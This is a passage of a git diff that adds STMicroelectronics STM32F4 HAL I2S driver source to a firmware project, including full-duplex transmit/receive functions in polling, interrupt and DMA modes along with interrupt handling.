error callback*/ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_OVR); + /* Call user error callback */ +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + hi2s->ErrorCallback(hi2s); +#else + HAL_I2S_ErrorCallback(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ + } + } + + if (hi2s->State == HAL_I2S_STATE_BUSY_TX) + { + /* I2S in mode Transmitter -----------------------------------------------*/ + if (((i2ssr & I2S_FLAG_TXE) == I2S_FLAG_TXE) && (__HAL_I2S_GET_IT_SOURCE(hi2s, I2S_IT_TXE) != RESET)) + { + I2S_Transmit_IT(hi2s); + } + + /* I2S Underrun error interrupt occurred --------------------------------*/ + if (((i2ssr & I2S_FLAG_UDR) == I2S_FLAG_UDR) && (__HAL_I2S_GET_IT_SOURCE(hi2s, I2S_IT_ERR) != RESET)) + { + /* Disable TXE and ERR interrupt */ + __HAL_I2S_DISABLE_IT(hi2s, (I2S_IT_TXE | I2S_IT_ERR)); + + /* Clear Underrun flag */ + __HAL_I2S_CLEAR_UDRFLAG(hi2s); + + /* Set the I2S State ready */ + hi2s->State = HAL_I2S_STATE_READY; + + /* Set the error code and execute error callback*/ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_UDR); + /* Call user error callback */ +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + hi2s->ErrorCallback(hi2s); +#else + HAL_I2S_ErrorCallback(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ + } + } +} + +/** + * @brief This function handles I2S Communication Timeout. + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @param Flag Flag checked + * @param State Value of the flag expected + * @param Timeout Duration of the timeout + * @retval HAL status + */ +static HAL_StatusTypeDef I2S_WaitFlagStateUntilTimeout(I2S_HandleTypeDef *hi2s, uint32_t Flag, FlagStatus State, + uint32_t Timeout) +{ + uint32_t tickstart; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait until flag is set to status*/ + while (((__HAL_I2S_GET_FLAG(hi2s, Flag)) ? SET : RESET) != State) + { + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) >= Timeout) || (Timeout == 0U)) + { + /* Set the I2S State ready */ + hi2s->State = HAL_I2S_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2s); + + return HAL_TIMEOUT; + } + } + } + return HAL_OK; +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* HAL_I2S_MODULE_ENABLED */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_i2s_ex.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_i2s_ex.c new file mode 100644 index 000000000..cd0db5e90 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_i2s_ex.c @@ -0,0 +1,1138 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_i2s_ex.c + * @author MCD Application Team + * @brief I2S HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of I2S extension peripheral: + * + Extension features Functions + * + @verbatim + ============================================================================== + ##### I2S Extension features ##### + ============================================================================== + [..] + (#) In I2S full duplex mode, each SPI peripheral is able to manage sending and receiving + data simultaneously using two data lines. Each SPI peripheral has an extended block + called I2Sxext (i.e I2S2ext for SPI2 and I2S3ext for SPI3). + (#) The extension block is not a full SPI IP, it is used only as I2S slave to + implement full duplex mode. The extension block uses the same clock sources + as its master. + + (#) Both I2Sx and I2Sx_ext can be configured as transmitters or receivers. + + [..] + (@) Only I2Sx can deliver SCK and WS to I2Sx_ext in full duplex mode, where + I2Sx can be I2S2 or I2S3. + + ##### How to use this driver ##### + =============================================================================== + [..] + Three operation modes are available within this driver : + + *** Polling mode IO operation *** + ================================= + [..] + (+) Send and receive in the same time an amount of data in blocking mode using HAL_I2SEx_TransmitReceive() + + *** Interrupt mode IO operation *** + =================================== + [..] + (+) Send and receive in the same time an amount of data in non blocking mode using HAL_I2SEx_TransmitReceive_IT() + (+) At transmission/reception end of transfer HAL_I2SEx_TxRxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_I2SEx_TxRxCpltCallback + (+) In case of transfer Error, HAL_I2S_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_I2S_ErrorCallback + + *** DMA mode IO operation *** + ============================== + [..] + (+) Send and receive an amount of data in non blocking mode (DMA) using HAL_I2SEx_TransmitReceive_DMA() + (+) At transmission/reception end of transfer HAL_I2SEx_TxRxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_I2S_TxRxCpltCallback + (+) In case of transfer Error, HAL_I2S_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_I2S_ErrorCallback + (+) __HAL_I2SEXT_FLUSH_RX_DR: In Full-Duplex Slave mode, if HAL_I2S_DMAStop is used to stop the + communication, an error HAL_I2S_ERROR_BUSY_LINE_RX is raised as the master continue to transmit data. + In this case __HAL_I2SEXT_FLUSH_RX_DR macro must be used to flush the remaining data + inside I2Sx and I2Sx_ext DR registers and avoid using DeInit/Init process for the next transfer. + @endverbatim + + Additional Figure: The Extended block uses the same clock sources as its master. + + +-----------------------+ + I2Sx_SCK | | + ----------+-->| I2Sx |------------------->I2Sx_SD(in/out) + +--|-->| | + | | +-----------------------+ + | | + I2S_WS | | + ------>| | + | | +-----------------------+ + | +-->| | + | | I2Sx_ext |------------------->I2Sx_extSD(in/out) + +----->| | + +-----------------------+ + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +#ifdef HAL_I2S_MODULE_ENABLED + +/** @defgroup I2SEx I2SEx + * @brief I2S Extended HAL module driver + * @{ + */ + +#if defined (SPI_I2S_FULLDUPLEX_SUPPORT) + +/* Private typedef -----------------------------------------------------------*/ +/** @defgroup I2SEx_Private_Typedef I2S Extended Private Typedef + * @{ + */ +typedef enum +{ + I2S_USE_I2S = 0x00U, /*!< I2Sx should be used */ + I2S_USE_I2SEXT = 0x01U, /*!< I2Sx_ext should be used */ +} I2S_UseTypeDef; +/** + * @} + */ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/** @defgroup I2SEx_Private_Functions I2S Extended Private Functions + * @{ + */ +static void I2SEx_TxRxDMAHalfCplt(DMA_HandleTypeDef *hdma); +static void I2SEx_TxRxDMACplt(DMA_HandleTypeDef *hdma); +static void I2SEx_TxRxDMAError(DMA_HandleTypeDef *hdma); +static void I2SEx_RxISR_I2S(I2S_HandleTypeDef *hi2s); +static void I2SEx_RxISR_I2SExt(I2S_HandleTypeDef *hi2s); +static void I2SEx_TxISR_I2S(I2S_HandleTypeDef *hi2s); +static void I2SEx_TxISR_I2SExt(I2S_HandleTypeDef *hi2s); +static HAL_StatusTypeDef I2SEx_FullDuplexWaitFlagStateUntilTimeout(I2S_HandleTypeDef *hi2s, + uint32_t Flag, + uint32_t State, + uint32_t Timeout, + I2S_UseTypeDef i2sUsed); +/** + * @} + */ + +/** + * @} + */ + +/* Private functions ---------------------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ + +/** @addtogroup I2SEx I2SEx + * @{ + */ + +/** @addtogroup I2SEx_Exported_Functions I2S Extended Exported Functions + * @{ + */ + +/** @defgroup I2SEx_Exported_Functions_Group1 I2S Extended IO operation functions + * @brief I2SEx IO operation functions + * +@verbatim + =============================================================================== + ##### IO operation functions##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to manage the I2S data + transfers. + + (#) There are two modes of transfer: + (++) Blocking mode : The communication is performed in the polling mode. + The status of all data processing is returned by the same function + after finishing transfer. + (++) No-Blocking mode : The communication is performed using Interrupts + or DMA. These functions return the status of the transfer startup. + The end of the data processing will be indicated through the + dedicated I2S IRQ when using Interrupt mode or the DMA IRQ when + using DMA mode. + + (#) Blocking mode functions are : + (++) HAL_I2SEx_TransmitReceive() + + (#) No-Blocking mode functions with Interrupt are : + (++) HAL_I2SEx_TransmitReceive_IT() + (++) HAL_I2SEx_FullDuplex_IRQHandler() + + (#) No-Blocking mode functions with DMA are : + (++) HAL_I2SEx_TransmitReceive_DMA() + + (#) A set of Transfer Complete Callback are provided in non Blocking mode: + (++) HAL_I2SEx_TxRxCpltCallback() +@endverbatim + * @{ + */ +/** + * @brief Full-Duplex Transmit/Receive data in blocking mode. + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @param pTxData a 16-bit pointer to the Transmit data buffer. + * @param pRxData a 16-bit pointer to the Receive data buffer. + * @param Size number of data sample to be sent: + * @note When a 16-bit data frame or a 16-bit data frame extended is selected during the I2S + * configuration phase, the Size parameter means the number of 16-bit data length + * in the transaction and when a 24-bit data frame or a 32-bit data frame is selected + * the Size parameter means the number of 16-bit data length. + * @param Timeout Timeout duration + * @note The I2S is kept enabled at the end of transaction to avoid the clock de-synchronization + * between Master and Slave(example: audio streaming). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2SEx_TransmitReceive(I2S_HandleTypeDef *hi2s, + uint16_t *pTxData, + uint16_t *pRxData, + uint16_t Size, + uint32_t Timeout) +{ + uint32_t tmp1 = 0U; + HAL_StatusTypeDef errorcode = HAL_OK; + + if (hi2s->State != HAL_I2S_STATE_READY) + { + errorcode = HAL_BUSY; + goto error; + } + + if ((pTxData == NULL) || (pRxData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hi2s); + + tmp1 = hi2s->Instance->I2SCFGR & (SPI_I2SCFGR_DATLEN | SPI_I2SCFGR_CHLEN); + /* Check the Data format: When a 16-bit data frame or a 16-bit data frame extended + is selected during the I2S configuration phase, the Size parameter means the number + of 16-bit data length in the transaction and when a 24-bit data frame or a 32-bit data + frame is selected the Size parameter means the number of 16-bit data length. */ + if ((tmp1 == I2S_DATAFORMAT_24B) || (tmp1 == I2S_DATAFORMAT_32B)) + { + hi2s->TxXferSize = (Size << 1U); + hi2s->TxXferCount = (Size << 1U); + hi2s->RxXferSize = (Size << 1U); + hi2s->RxXferCount = (Size << 1U); + } + else + { + hi2s->TxXferSize = Size; + hi2s->TxXferCount = Size; + hi2s->RxXferSize = Size; + hi2s->RxXferCount = Size; + } + + /* Set state and reset error code */ + hi2s->ErrorCode = HAL_I2S_ERROR_NONE; + hi2s->State = HAL_I2S_STATE_BUSY_TX_RX; + + tmp1 = hi2s->Instance->I2SCFGR & SPI_I2SCFGR_I2SCFG; + /* Check if the I2S_MODE_MASTER_TX or I2S_MODE_SLAVE_TX Mode is selected */ + if ((tmp1 == I2S_MODE_MASTER_TX) || (tmp1 == I2S_MODE_SLAVE_TX)) + { + /* Prepare the First Data before enabling the I2S */ + hi2s->Instance->DR = (*pTxData++); + hi2s->TxXferCount--; + + /* Enable I2Sext(receiver) before enabling I2Sx peripheral */ + __HAL_I2SEXT_ENABLE(hi2s); + + /* Enable I2Sx peripheral */ + __HAL_I2S_ENABLE(hi2s); + + /* Check if Master Receiver mode is selected */ + if ((hi2s->Instance->I2SCFGR & SPI_I2SCFGR_I2SCFG) == I2S_MODE_MASTER_TX) + { + /* Clear the Overrun Flag by a read operation on the SPI_DR register followed by a read + access to the SPI_SR register. */ + __HAL_I2SEXT_CLEAR_OVRFLAG(hi2s); + } + + while ((hi2s->RxXferCount > 0U) || (hi2s->TxXferCount > 0U)) + { + if (hi2s->TxXferCount > 0U) + { + /* Wait until TXE flag is set */ + if (I2SEx_FullDuplexWaitFlagStateUntilTimeout(hi2s, I2S_FLAG_TXE, SET, Timeout, I2S_USE_I2S) != HAL_OK) + { + /* Set the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_TIMEOUT); + errorcode = HAL_ERROR; + goto error; + } + /* Write Data on DR register */ + hi2s->Instance->DR = (*pTxData++); + hi2s->TxXferCount--; + + /* Check if an underrun occurs */ + if ((__HAL_I2S_GET_FLAG(hi2s, I2S_FLAG_UDR) == SET) && (tmp1 == I2S_MODE_SLAVE_TX)) + { + /* Clear Underrun flag */ + __HAL_I2S_CLEAR_UDRFLAG(hi2s); + + /* Set the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_UDR); + } + } + if (hi2s->RxXferCount > 0U) + { + /* Wait until RXNE flag is set */ + if (I2SEx_FullDuplexWaitFlagStateUntilTimeout(hi2s, I2S_FLAG_RXNE, SET, Timeout, I2S_USE_I2SEXT) != HAL_OK) + { + /* Set the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_TIMEOUT); + errorcode = HAL_ERROR; + goto error; + } + /* Read Data from DR register */ + (*pRxData++) = I2SxEXT(hi2s->Instance)->DR; + hi2s->RxXferCount--; + + /* Check if an overrun occurs */ + if (__HAL_I2SEXT_GET_FLAG(hi2s, I2S_FLAG_OVR) == SET) + { + /* Clear Overrun flag */ + __HAL_I2S_CLEAR_OVRFLAG(hi2s); + + /* Set the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_OVR); + } + } + } + } + /* The I2S_MODE_MASTER_RX or I2S_MODE_SLAVE_RX Mode is selected */ + else + { + /* Prepare the First Data before enabling the I2S */ + I2SxEXT(hi2s->Instance)->DR = (*pTxData++); + hi2s->TxXferCount--; + + /* Enable I2Sext(transmitter) after enabling I2Sx peripheral */ + __HAL_I2SEXT_ENABLE(hi2s); + + /* Enable I2S peripheral before the I2Sext*/ + __HAL_I2S_ENABLE(hi2s); + + /* Check if Master Receiver mode is selected */ + if ((hi2s->Instance->I2SCFGR & SPI_I2SCFGR_I2SCFG) == I2S_MODE_MASTER_RX) + { + /* Clear the Overrun Flag by a read operation on the SPI_DR register followed by a read + access to the SPI_SR register. */ + __HAL_I2S_CLEAR_OVRFLAG(hi2s); + } + + while ((hi2s->RxXferCount > 0U) || (hi2s->TxXferCount > 0U)) + { + if (hi2s->TxXferCount > 0U) + { + /* Wait until TXE flag is set */ + if (I2SEx_FullDuplexWaitFlagStateUntilTimeout(hi2s, I2S_FLAG_TXE, SET, Timeout, I2S_USE_I2SEXT) != HAL_OK) + { + /* Set the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_TIMEOUT); + errorcode = HAL_ERROR; + goto error; + } + /* Write Data on DR register */ + I2SxEXT(hi2s->Instance)->DR = (*pTxData++); + hi2s->TxXferCount--; + + /* Check if an underrun occurs */ + if ((__HAL_I2SEXT_GET_FLAG(hi2s, I2S_FLAG_UDR) == SET) && (tmp1 == I2S_MODE_SLAVE_RX)) + { + /* Clear Underrun flag */ + __HAL_I2S_CLEAR_UDRFLAG(hi2s); + + /* Set the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_UDR); + } + } + if (hi2s->RxXferCount > 0U) + { + /* Wait until RXNE flag is set */ + if (I2SEx_FullDuplexWaitFlagStateUntilTimeout(hi2s, I2S_FLAG_RXNE, SET, Timeout, I2S_USE_I2S) != HAL_OK) + { + /* Set the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_TIMEOUT); + errorcode = HAL_ERROR; + goto error; + } + /* Read Data from DR register */ + (*pRxData++) = hi2s->Instance->DR; + hi2s->RxXferCount--; + + /* Check if an overrun occurs */ + if (__HAL_I2S_GET_FLAG(hi2s, I2S_FLAG_OVR) == SET) + { + /* Clear Overrun flag */ + __HAL_I2S_CLEAR_OVRFLAG(hi2s); + + /* Set the error code */ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_OVR); + } + } + } + } + + if (hi2s->ErrorCode != HAL_I2S_ERROR_NONE) + { + errorcode = HAL_ERROR; + } + +error : + hi2s->State = HAL_I2S_STATE_READY; + __HAL_UNLOCK(hi2s); + return errorcode; +} + +/** + * @brief Full-Duplex Transmit/Receive data in non-blocking mode using Interrupt + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @param pTxData a 16-bit pointer to the Transmit data buffer. + * @param pRxData a 16-bit pointer to the Receive data buffer. + * @param Size number of data sample to be sent: + * @note When a 16-bit data frame or a 16-bit data frame extended is selected during the I2S + * configuration phase, the Size parameter means the number of 16-bit data length + * in the transaction and when a 24-bit data frame or a 32-bit data frame is selected + * the Size parameter means the number of 16-bit data length. + * @note The I2S is kept enabled at the end of transaction to avoid the clock de-synchronization + * between Master and Slave(example: audio streaming). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2SEx_TransmitReceive_IT(I2S_HandleTypeDef *hi2s, + uint16_t *pTxData, + uint16_t *pRxData, + uint16_t Size) +{ + uint32_t tmp1 = 0U; + HAL_StatusTypeDef errorcode = HAL_OK; + + if (hi2s->State != HAL_I2S_STATE_READY) + { + errorcode = HAL_BUSY; + goto error; + } + + if ((pTxData == NULL) || (pRxData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hi2s); + + hi2s->pTxBuffPtr = pTxData; + hi2s->pRxBuffPtr = pRxData; + + tmp1 = hi2s->Instance->I2SCFGR & (SPI_I2SCFGR_DATLEN | SPI_I2SCFGR_CHLEN); + /* Check the Data format: When a 16-bit data frame or a 16-bit data frame extended + is selected during the I2S configuration phase, the Size parameter means the number + of 16-bit data length in the transaction and when a 24-bit data frame or a 32-bit data + frame is selected the Size parameter means the number of 16-bit data length. */ + if ((tmp1 == I2S_DATAFORMAT_24B) || (tmp1 == I2S_DATAFORMAT_32B)) + { + hi2s->TxXferSize = (Size << 1U); + hi2s->TxXferCount = (Size << 1U); + hi2s->RxXferSize = (Size << 1U); + hi2s->RxXferCount = (Size << 1U); + } + else + { + hi2s->TxXferSize = Size; + hi2s->TxXferCount = Size; + hi2s->RxXferSize = Size; + hi2s->RxXferCount = Size; + } + + hi2s->ErrorCode = HAL_I2S_ERROR_NONE; + hi2s->State = HAL_I2S_STATE_BUSY_TX_RX; + + /* Set the function for IT treatment */ + if ((hi2s->Init.Mode == I2S_MODE_MASTER_TX) || (hi2s->Init.Mode == I2S_MODE_SLAVE_TX)) + { + /* Enable I2Sext RXNE and ERR interrupts */ + __HAL_I2SEXT_ENABLE_IT(hi2s, (I2S_IT_RXNE | I2S_IT_ERR)); + + /* Enable I2Sx TXE and ERR interrupts */ + __HAL_I2S_ENABLE_IT(hi2s, (I2S_IT_TXE | I2S_IT_ERR)); + + /* Transmit First data */ + hi2s->Instance->DR = (*hi2s->pTxBuffPtr++); + hi2s->TxXferCount--; + + if (hi2s->TxXferCount == 0U) + { + /* Disable TXE and ERR interrupt */ + __HAL_I2S_DISABLE_IT(hi2s, (I2S_IT_TXE | I2S_IT_ERR)); + } + } + else /* The I2S_MODE_MASTER_RX or I2S_MODE_SLAVE_RX Mode is selected */ + { + /* Enable I2Sext TXE and ERR interrupts */ + __HAL_I2SEXT_ENABLE_IT(hi2s, (I2S_IT_TXE | I2S_IT_ERR)); + + /* Enable I2Sext RXNE and ERR interrupts */ + __HAL_I2S_ENABLE_IT(hi2s, (I2S_IT_RXNE | I2S_IT_ERR)); + + /* Transmit First data */ + I2SxEXT(hi2s->Instance)->DR = (*hi2s->pTxBuffPtr++); + hi2s->TxXferCount--; + + if (hi2s->TxXferCount == 0U) + { + /* Disable I2Sext TXE and ERR interrupt */ + __HAL_I2SEXT_DISABLE_IT(hi2s, (I2S_IT_TXE | I2S_IT_ERR)); + } + } + + /* Enable I2Sext peripheral */ + __HAL_I2SEXT_ENABLE(hi2s); + + /* Enable I2S peripheral */ + __HAL_I2S_ENABLE(hi2s); + +error : + __HAL_UNLOCK(hi2s); + return errorcode; +} + +/** + * @brief Full-Duplex Transmit/Receive data in non-blocking mode using DMA + * @param hi2s pointer to a I2S_HandleTypeDef structure that contains + * the configuration information for I2S module + * @param pTxData a 16-bit pointer to the Transmit data buffer. + * @param pRxData a 16-bit pointer to the Receive data buffer. + * @param Size number of data sample to be sent: + * @note When a 16-bit data frame or a 16-bit data frame extended is selected during the I2S + * configuration phase, the Size parameter means the number of 16-bit data length + * in the transaction and when a 24-bit data frame or a 32-bit data frame is selected + * the Size parameter means the number of 16-bit data length. + * @note The I2S is kept enabled at the end of transaction to avoid the clock de-synchronization + * between Master and Slave(example: audio streaming). + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2SEx_TransmitReceive_DMA(I2S_HandleTypeDef *hi2s, + uint16_t *pTxData, + uint16_t *pRxData, + uint16_t Size) +{ + uint32_t *tmp = NULL; + uint32_t tmp1 = 0U; + HAL_StatusTypeDef errorcode = HAL_OK; + + if (hi2s->State != HAL_I2S_STATE_READY) + { + errorcode = HAL_BUSY; + goto error; + } + + if ((pTxData == NULL) || (pRxData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hi2s); + + hi2s->pTxBuffPtr = pTxData; + hi2s->pRxBuffPtr = pRxData; + + tmp1 = hi2s->Instance->I2SCFGR & (SPI_I2SCFGR_DATLEN | SPI_I2SCFGR_CHLEN); + /* Check the Data format: When a 16-bit data frame or a 16-bit data frame extended + is selected during the I2S configuration phase, the Size parameter means the number + of 16-bit data length in the transaction and when a 24-bit data frame or a 32-bit data + frame is selected the Size parameter means the number of 16-bit data length. */ + if ((tmp1 == I2S_DATAFORMAT_24B) || (tmp1 == I2S_DATAFORMAT_32B)) + { + hi2s->TxXferSize = (Size << 1U); + hi2s->TxXferCount = (Size << 1U); + hi2s->RxXferSize = (Size << 1U); + hi2s->RxXferCount = (Size << 1U); + } + else + { + hi2s->TxXferSize = Size; + hi2s->TxXferCount = Size; + hi2s->RxXferSize = Size; + hi2s->RxXferCount = Size; + } + + hi2s->ErrorCode = HAL_I2S_ERROR_NONE; + hi2s->State = HAL_I2S_STATE_BUSY_TX_RX; + + /* Set the I2S Rx DMA Half transfer complete callback */ + hi2s->hdmarx->XferHalfCpltCallback = I2SEx_TxRxDMAHalfCplt; + + /* Set the I2S Rx DMA transfer complete callback */ + hi2s->hdmarx->XferCpltCallback = I2SEx_TxRxDMACplt; + + /* Set the I2S Rx DMA error callback */ + hi2s->hdmarx->XferErrorCallback = I2SEx_TxRxDMAError; + + /* Set the I2S Tx DMA Half transfer complete callback as NULL */ + hi2s->hdmatx->XferHalfCpltCallback = NULL; + + /* Set the I2S Tx DMA transfer complete callback as NULL */ + hi2s->hdmatx->XferCpltCallback = NULL; + + /* Set the I2S Tx DMA error callback */ + hi2s->hdmatx->XferErrorCallback = I2SEx_TxRxDMAError; + + tmp1 = hi2s->Instance->I2SCFGR & SPI_I2SCFGR_I2SCFG; + /* Check if the I2S_MODE_MASTER_TX or I2S_MODE_SLAVE_TX Mode is selected */ + if ((tmp1 == I2S_MODE_MASTER_TX) || (tmp1 == I2S_MODE_SLAVE_TX)) + { + /* Enable the Rx DMA Stream */ + tmp = (uint32_t *)&pRxData; + HAL_DMA_Start_IT(hi2s->hdmarx, (uint32_t)&I2SxEXT(hi2s->Instance)->DR, *(uint32_t *)tmp, hi2s->RxXferSize); + + /* Enable Rx DMA Request */ + SET_BIT(I2SxEXT(hi2s->Instance)->CR2, SPI_CR2_RXDMAEN); + + /* Enable the Tx DMA Stream */ + tmp = (uint32_t *)&pTxData; + HAL_DMA_Start_IT(hi2s->hdmatx, *(uint32_t *)tmp, (uint32_t)&hi2s->Instance->DR, hi2s->TxXferSize); + + /* Enable Tx DMA Request */ + SET_BIT(hi2s->Instance->CR2, SPI_CR2_TXDMAEN); + + /* Check if the I2S is already enabled */ + if ((hi2s->Instance->I2SCFGR & SPI_I2SCFGR_I2SE) != SPI_I2SCFGR_I2SE) + { + /* Enable I2Sext(receiver) before enabling I2Sx peripheral */ + __HAL_I2SEXT_ENABLE(hi2s); + + /* Enable I2S peripheral after the I2Sext */ + __HAL_I2S_ENABLE(hi2s); + } + } + else + { + /* Check if Master Receiver mode is selected */ + if ((hi2s->Instance->I2SCFGR & SPI_I2SCFGR_I2SCFG) == I2S_MODE_MASTER_RX) + { + /* Clear the Overrun Flag by a read operation on the SPI_DR register followed by a read + access to the SPI_SR register. */ + __HAL_I2S_CLEAR_OVRFLAG(hi2s); + } + /* Enable the Tx DMA Stream */ + tmp = (uint32_t *)&pTxData; + HAL_DMA_Start_IT(hi2s->hdmatx, *(uint32_t *)tmp, (uint32_t)&I2SxEXT(hi2s->Instance)->DR, hi2s->TxXferSize); + + /* Enable Tx DMA Request */ + SET_BIT(I2SxEXT(hi2s->Instance)->CR2, SPI_CR2_TXDMAEN); + + /* Enable the Rx DMA Stream */ + tmp = (uint32_t *)&pRxData; + HAL_DMA_Start_IT(hi2s->hdmarx, (uint32_t)&hi2s->Instance->DR, *(uint32_t *)tmp, hi2s->RxXferSize); + + /* Enable Rx DMA Request */ + SET_BIT(hi2s->Instance->CR2, SPI_CR2_RXDMAEN); + + /* Check if the I2S is already enabled */ + if ((hi2s->Instance->I2SCFGR & SPI_I2SCFGR_I2SE) != SPI_I2SCFGR_I2SE) + { + /* Enable I2Sext(transmitter) before enabling I2Sx peripheral */ + __HAL_I2SEXT_ENABLE(hi2s); + /* Enable I2S peripheral before the I2Sext */ + __HAL_I2S_ENABLE(hi2s); + } + } + +error : + __HAL_UNLOCK(hi2s); + return errorcode; +} + +/** + * @brief This function handles I2S/I2Sext interrupt requests in full-duplex mode. + * @param hi2s I2S handle + * @retval HAL status + */ +void HAL_I2SEx_FullDuplex_IRQHandler(I2S_HandleTypeDef *hi2s) +{ + __IO uint32_t i2ssr = hi2s->Instance->SR; + __IO uint32_t i2sextsr = I2SxEXT(hi2s->Instance)->SR; + __IO uint32_t i2scr2 = hi2s->Instance->CR2; + __IO uint32_t i2sextcr2 = I2SxEXT(hi2s->Instance)->CR2; + + /* Check if the I2S_MODE_MASTER_TX or I2S_MODE_SLAVE_TX Mode is selected */ + if ((hi2s->Init.Mode == I2S_MODE_MASTER_TX) || (hi2s->Init.Mode == I2S_MODE_SLAVE_TX)) + { + /* I2S in mode Transmitter -------------------------------------------------*/ + if (((i2ssr & I2S_FLAG_TXE) == I2S_FLAG_TXE) && ((i2scr2 & I2S_IT_TXE) != RESET)) + { + /* When the I2S mode is configured as I2S_MODE_MASTER_TX or I2S_MODE_SLAVE_TX, + the I2S TXE interrupt will be generated to manage the full-duplex transmit phase. */ + I2SEx_TxISR_I2S(hi2s); + } + + /* I2Sext in mode Receiver -----------------------------------------------*/ + if (((i2sextsr & I2S_FLAG_RXNE) == I2S_FLAG_RXNE) && ((i2sextcr2 & I2S_IT_RXNE) != RESET)) + { + /* When the I2S mode is configured as I2S_MODE_MASTER_TX or I2S_MODE_SLAVE_TX, + the I2Sext RXNE interrupt will be generated to manage the full-duplex receive phase. */ + I2SEx_RxISR_I2SExt(hi2s); + } + + /* I2Sext Overrun error interrupt occurred --------------------------------*/ + if (((i2sextsr & I2S_FLAG_OVR) == I2S_FLAG_OVR) && ((i2sextcr2 & I2S_IT_ERR) != RESET)) + { + /* Disable RXNE and ERR interrupt */ + __HAL_I2SEXT_DISABLE_IT(hi2s, (I2S_IT_RXNE | I2S_IT_ERR)); + + /* Disable TXE and ERR interrupt */ + __HAL_I2S_DISABLE_IT(hi2s, (I2S_IT_TXE | I2S_IT_ERR)); + + /* Clear Overrun flag */ + __HAL_I2S_CLEAR_OVRFLAG(hi2s); + + /* Set the I2S State ready */ + hi2s->State = HAL_I2S_STATE_READY; + + /* Set the error code and execute error callback*/ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_OVR); + /* Call user error callback */ +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + hi2s->ErrorCallback(hi2s); +#else + HAL_I2S_ErrorCallback(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ + } + + /* I2S Underrun error interrupt occurred ----------------------------------*/ + if (((i2ssr & I2S_FLAG_UDR) == I2S_FLAG_UDR) && ((i2scr2 & I2S_IT_ERR) != RESET)) + { + /* Disable TXE and ERR interrupt */ + __HAL_I2S_DISABLE_IT(hi2s, (I2S_IT_TXE | I2S_IT_ERR)); + + /* Disable RXNE and ERR interrupt */ + __HAL_I2SEXT_DISABLE_IT(hi2s, (I2S_IT_RXNE | I2S_IT_ERR)); + + /* Clear underrun flag */ + __HAL_I2S_CLEAR_UDRFLAG(hi2s); + + /* Set the I2S State ready */ + hi2s->State = HAL_I2S_STATE_READY; + + /* Set the error code and execute error callback*/ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_UDR); + /* Call user error callback */ +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + hi2s->ErrorCallback(hi2s); +#else + HAL_I2S_ErrorCallback(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ + } + } + /* The I2S_MODE_MASTER_RX or I2S_MODE_SLAVE_RX Mode is selected */ + else + { + /* I2Sext in mode Transmitter ----------------------------------------------*/ + if (((i2sextsr & I2S_FLAG_TXE) == I2S_FLAG_TXE) && ((i2sextcr2 & I2S_IT_TXE) != RESET)) + { + /* When the I2S mode is configured as I2S_MODE_MASTER_RX or I2S_MODE_SLAVE_RX, + the I2Sext TXE interrupt will be generated to manage the full-duplex transmit phase. */ + I2SEx_TxISR_I2SExt(hi2s); + } + + /* I2S in mode Receiver --------------------------------------------------*/ + if (((i2ssr & 